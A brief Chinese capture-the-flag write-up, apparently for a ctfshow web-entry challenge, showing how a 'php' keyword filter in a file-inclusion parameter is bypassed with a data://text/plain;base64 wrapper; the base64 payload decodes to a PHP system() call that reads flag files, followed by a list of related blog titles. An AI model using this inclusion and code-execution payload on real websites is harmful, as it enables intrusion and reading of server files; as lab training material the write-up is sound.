在web37的基础上过滤了php
使用data://text/plain;base64绕过
payload:?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=
PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=即<?php system("cat f*");
相关文章
- 11-11ctf_show-web入门-其他-(396-405)
- 11-1134-10000 web入门 HTML5布局 (div标签使用)持续高强度的投入技术研发工作,才能创造大的价值!
- 11-1124-10000 web开发入门-HTML布局 网页布局
- 11-11.Net Core gRPC入门(二)——Web客户端
- 11-11web前端入门到实战:CSS属性width和height
- 11-11Cobalt Strike从入门到精通之Web Drive-By web钓鱼攻击
- 11-11Cobalt Strike从入门到精通之Web Drive-By web钓鱼攻击
- 11-11ctfshow之Web入门89-91
- 11-11区块链学习之Web3j入门(七): 以太坊通知机制
- 11-11web前端入门到实战:纯css制作电闪雷鸣的天气图标